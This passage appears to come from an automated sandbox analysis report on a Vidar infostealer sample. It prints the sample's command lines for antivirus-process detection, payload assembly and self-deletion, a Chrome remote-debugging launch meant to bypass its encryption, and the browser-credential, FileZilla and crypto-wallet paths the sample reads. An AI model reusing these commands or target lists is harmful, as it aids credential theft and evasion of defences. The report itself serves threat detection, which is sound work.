                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A52992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00A52992
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A40BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00A40BAF
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A40D45 SetUnhandledExceptionFilter,10_2_00A40D45
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A40F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00A40F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: Iceland.com PID: 7592, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A81B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00A81B4D
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A2338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00A2338B
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A8BBED SendInput,keybd_event,10_2_00A8BBED
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A8EC9E mouse_event,10_2_00A8EC9E
                Source: C:\Users\user\Desktop\yoda.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 314782Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "INSPIRED" Interview Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther AJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Iceland.com AJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\314782\Iceland.com" & rd /s /q "C:\ProgramData\4EK6XL68GLNY" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A814AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_00A814AE
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A81FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00A81FB0
                Source: Iceland.com, 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp, Dedicated.0.dr, Iceland.com.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Iceland.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A40A08 cpuid 10_2_00A40A08
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A7E5F4 GetLocalTime,10_2_00A7E5F4
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A7E652 GetUserNameW,10_2_00A7E652
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00A5BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_00A5BCD2
                Source: C:\Users\user\Desktop\yoda.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 10.2.Iceland.com.3970000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000003.1950389528.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2871233735.0000000003971000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2868559733.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1950013637.0000000003795000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1949965283.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2869693488.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Iceland.com PID: 7592, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: Iceland.com, 0000000A.00000002.2866383443.00000000007CD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *electrum*.*
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: info.seco
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                Source: Iceland.com, 0000000A.00000002.2866383443.00000000007CD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *exodus*.*
                Source: Iceland.com, 0000000A.00000002.2866383443.00000000007CD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: seed.seco
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: Iceland.com, 0000000A.00000002.2871233735.0000000003B1C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Iceland.comBinary or memory string: WIN_81
                Source: Iceland.comBinary or memory string: WIN_XP
                Source: Iceland.com.1.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Iceland.comBinary or memory string: WIN_XPe
                Source: Iceland.comBinary or memory string: WIN_VISTA
                Source: Iceland.comBinary or memory string: WIN_7
                Source: Iceland.comBinary or memory string: WIN_8
                Source: Yara matchFile source: 0000000A.00000002.2871233735.0000000003A4D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Iceland.com PID: 7592, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Attempt to bypass Chrome Application-Bound Encryption
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 10.2.Iceland.com.3970000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000003.1950389528.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2871233735.0000000003971000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2868559733.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1950013637.0000000003795000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1949965283.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2869693488.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Iceland.com PID: 7592, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00AA2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00AA2263
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.comCode function: 10_2_00AA1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_00AA1C61

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		21
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API                		2
                Valid Accounts                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol4
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Extra Window Memory Injection                		2
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares21
                Input Capture                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		1
                DLL Side-Loading                		NTDS37
                System Information Discovery                		Distributed Component Object Model3
                Clipboard Data                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                Extra Window Memory Injection                		LSA Secrets1
                Query Registry                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                Process Injection                		121
                Masquerading                		Cached Domain Credentials241
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts                		DCSync13
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job13
                Virtualization/Sandbox Evasion                		Proc Filesystem4
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
